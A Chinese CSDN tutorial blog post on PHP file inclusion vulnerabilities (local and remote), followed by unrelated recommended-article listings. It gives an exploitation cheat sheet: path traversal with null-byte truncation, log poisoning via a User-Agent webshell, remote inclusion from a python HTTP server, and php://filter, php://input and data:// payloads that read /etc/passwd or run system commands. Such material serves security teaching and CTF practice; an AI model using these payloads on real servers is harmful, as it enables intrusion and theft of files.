Learn file include vulnerability | Network security

已于 2023-04-04 14:40:58 修改
阅读量1.1k 收藏
点赞数
文章标签: php apache 开发语言 网络安全 文件漏洞
于 2023-04-03 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44340129/article/details/129907944
版权
文章详细介绍了文件包含漏洞的概念,包括本地文件包含(LFI)和远程文件包含(RFI),讨论了PHP、JSP和ASP中的文件包含函数,并提供了相关漏洞利用示例,如日志注入和伪协议利用,强调了网络安全中对此类漏洞的防范重要性。
摘要由CSDN通过智能技术生成

本文授权自 MagicBoy

Learn file include vulnerability | Network security

1.文件包含漏洞条件

开发者在开发过程中,会将可以重复利用的函数或代码块写入到单个文件当中,在使用某些函数时,直接调用对应即可,无需再次编写,这种调用文件的过程称之为文件包含

  1. 包含文件时采用动态包含的方式
  2. 对于包含的文件没有做详细的过滤和检验

PHP文件包含函数:include()、 include_once()、 require()、 require_once()、 fopen()、 readfile()

通过以上函数包含文件,无论文件后缀是什么,都会以php的方式进行解析

其它语言的文件包含:

  1. JSP文件包含函数:java.io.file()、java.io.filereader()、include(),动态包含只支持包含web路径下的jsp文件
  2. aspx文件包含函数:include file、include virtual,aspx和asp均不支持动态包含

2.文件包含漏洞分类

2.1. 本地文件包含(LFI)

包含文件和页面文件如果不在同一目录,包含的路径必须写相对路径或者绝对路径

被包含的文件的后缀无论是是什么都被被视作为PHP进行解析

本地包含任意文件 ../..\

追加后缀:%00截断,受限于php的版本

追加前缀:在文件路径前多一次跳转

包含日志文件,然后在User-Agent等地方上传一句话:

  • /var/log/apache2/access.log
  • /var/log/httpd/access.log
  • /var/log/nginx/access.log

2.2. 远程文件包含(RFI)

代码注入的一种,通过包含的方式远程注入一段用户可控的脚本在服务端执行

远程注入前提条件:

  • allow_url_fopen ON
  • allow_url_include ON
  • 包含的变量前没有目录的限制
  • 远程包含文件路径必须为绝对路径
  • 被包含的文件能被服务器解析

临时启动http服务–python

python3 -m http.server 8000
python2 -m SimpleHTTPServer 8000

伪协议利用:

http://     //远程文件包含,python启用服务
ftp://
php://filter/read=convert.base64-encode/resource=
file:///ect/passwd
php://input
phar://压缩包路径/文件名称
zip://压缩包路径#文件名称    //记住#可能需要转码为%23
data://text/plain,<?php phpinfo();?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=

日志路径为常见路径/var/log/apache2/access.log,注意日志文件包含

如有侵权,请联系作者删除

小饅頭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
安全大模型以及训练数据集
学-> 思->用
05-21 97
安全大模型和数据集
个人网页、博客、课程--不断更新
qq_27009517的博客
12-18 2618
论文和相关代码 :https://paperswithcode.com/ Caiming Xiong http://www.stat.ucla.edu/~caiming/ 论文,代码,博客 肖小粤的啵嗑 http://xiaoxiaoyue.me/ 博客记录 小土刀 https://wdxtub.com/ 博客记录 博客 http://ruder.io/multi-task/...
PHP高效进销存管理系统智能管理库存销售与采购系统小程序源码
2401_84413795的博客
09-02 389
在这个快速发展的时代,企业要想在激烈的市场竞争中脱颖而出,就必须不断提升自身的运营效率和管理水平。高效进销存管理系统正是你实现这一目标的有力武器。它以其智能、高效、便捷的特点,帮助你轻松驾驭库存、销售与采购三大环节,引领你的企业迈向更加辉煌的未来!
DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板
2403_86698467的博客
09-02 374
包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。模板有很多细节都有体现,同时对官方模板文件结构和功能位置做了更为优化的设计处理,模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。
抽奖系统PHP源码开源二开版带完整后台
jiyc2008的博客
08-28 406
抽奖系统源码是一个以php MySQL进行开发的手机抽奖系统源码。用途:适合做推广营销、直播、粉丝抽奖。1、后台可以设置每个抽奖用户的抽奖次数,后台添加设置奖品,适和企业和商场搞活动,后台添加用户,才能抽奖。经过电脑管家、网站安全狗扫描特征码,没有发现可疑文件,请放心使用。该程序可以作为活动氛围活动气氛的烘托作用,活动游戏而已!3、后台可以设置每个奖品的中奖概率,中奖概率采用百分制。2、后台可以添加上传抽奖商品图片和奖品名称。测试环境:php5.6 Mysql。4、会员前台可以查询中奖记录。
使用 树莓派3B+ 对日本葡萄园进行经济实惠的环境监测
EDATEC的博客
08-29 1530
然而,他也热衷于酿造 “优质葡萄酒”,随着他所居住的东京北部胜沼地区葡萄酒旅游业的兴起,他感觉到了商机。菊岛热衷于在他所谓的 “Hinno ”物联网系统中使用太阳能,日语中的 “Hinno ”表明这是一种简单的农民葡萄栽培方法,因为太阳能还可以用来为电栅栏供电,防止动物靠近作物。他还可以在办公室里随时观察大气状况。对于 菊岛邦夫—Vineyard Kikushima 而言,Raspberry Pi 生态系统提供了支持和信息,通过基于温度和湿度监测的有针对性的最低限度杀虫剂方案,来提高葡萄的健康产量。
python反序列化
2301_79783285的博客
08-30 1238
pickle序列化:将 Python 对象转换为可以存储或传输的格式。反序列化:将序列化的数据转换回 Python 对象。pickle模块:支持复杂的 Python 对象,但存在安全风险。json模块:支持 JSON 格式,更安全,适用于大多数应用场景。安全性:处理不受信任的数据时,应避免使用pickle。r:只读模式。w:写入模式,会清空原有内容。a:追加模式。b:二进制模式。:读写模式。x:独占创建模式。t:文本模式(默认)。
Nginx的lnmp服务搭建
2201_75745826的博客
08-29 1339
nginx是一款功能强大的web服务器。和apache一样,有http和https两个服务。nginx功能强大,且库使用第三方模块,正反向代理等。Nginx默认采用多进程工作方式,Nginx启动后,会运行一个master进程和多个worker进程。其中master充当整个进程组与用户的交互接口,同时对进程进行监护,管理worker进程来实现重启服务、平滑升级、更换日志文件、配置文件实时生效等功能。worker用来处理基本的网络事件,worker之间是平等的,他们共同竞争来处理来自客户端的请求。
workman和GateWay学习笔记
lxp199741的博客
08-30 453
workman支持UdpGateWay是基于workman的二次封装,更适合长链接场景。
第三章 封装与继承
weixin_65279640的博客
08-28 1397
面向对象三大特征之一 ——封装概念:将类的某些信息隐藏在类内部,不允许外部程序直接访问,而是通过该类提供的方法来实现对隐藏信息的操作和访问把尽可能多的东西藏起来,对外提供便捷的接口。说白了就是把对象中的属性信息封装在对象类内部,不让用户直接使用类属性进行访问,而是定义一个方法作为类属性的接口提供给用户访问使用。封装的两个大致原则把所有的属性藏起来把尽可能多的东西藏起来,对外提供便捷的接口。
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件通用方法以及使用注意事项2024-08-30
Simon223的博客
08-31 427
RTX5源码全家桶集成emWin6.40, Modbus主从,含FreeRTOS版, 探讨一种移植第3方组件的通用方法以及多任务使用注意事项。2、RTX5/FreeRTOS全家桶首期视频,框架设计。3、CMSSIS-RTOS V2封装层教程。6、emWin和全家桶中间件的兼容问题。
vulhub xxe靶机
m0_75036923的博客
08-29 712
进入robots.txt里面会发现俩个目录然后我们进去xxe里面。可以看到关于密码和用户名的是xml,那么就可以考虑用xxe注入。解码出来是/etc/.flag.php然后重新修改xml。将admin.php改为flagmeout.php。可以看到有很多乱码,然后进行base64解码。进入xxe页面进行登录,burp抓包。解码后发现还需要进行以此md5解码。先用御剑扫描出ip然后进入网页。然后编成php文件进行访问。进行base32解密。
宝塔安装yasd 远程调试 swoole
刘登辉的博客
08-28 434
完美解决swoole不能用xdebug调试的问题
PHP伪协议
m0_71864767的博客
08-28 557
PHP伪协议(pseudo-protocol)是一种在PHP中用作文件访问的特殊机制。它允许通过“伪协议”指定一个处理方式来处理特定的文件或数据。
Linux网络:网络基础
Zhenyu_Coder的博客
08-27 1206
但随着局域网的产生,我们来需要将相隔千里的计算机链接起来,比如将中国和美国的一些计算机连接起来,由此广域网的概念诞生!相当于每台计算机都遵循相同的协议,相关的约定,从而保证所有计算机之间都能顺利通信,使得不同操作系统的主机能够进行可靠的通信!而在每台计算机内部,硬件之间的数据拷贝交换本身就是一种通信行为,而每台计算机中硬件的个数是有限的,并且由OS管控!这也为网络的诞生埋下伏笔!由于TCP/IP在OS中,处于核心地位,因此我们将TCP/IP作为一组协议的代名词,它还包括许多协议,组成了TCP/IP协议簇。
PHP 项目流水线部署与错误问题解决
最新发布
qq_33665793的博客
09-02 646
通过设置自动化的流水线部署,PHP 项目可以实现更高效、更可靠的部署过程。通过配置合适的 CI/CD 工具、自动化测试和构建步骤,可以确保每次发布的代码质量和稳定性。流水线部署(Pipeline Deployment)是一种自动化部署的过程,它将代码从开发环境经过一系列测试和审查流程,最终部署到生产环境。在现代软件开发中,持续集成(CI)和持续部署(CD)已成为确保代码质量和加快发布速度的关键实践。本文将介绍如何构建一个 PHP 项目的流水线部署,涵盖从代码提交到生产环境的自动化流程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小饅頭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值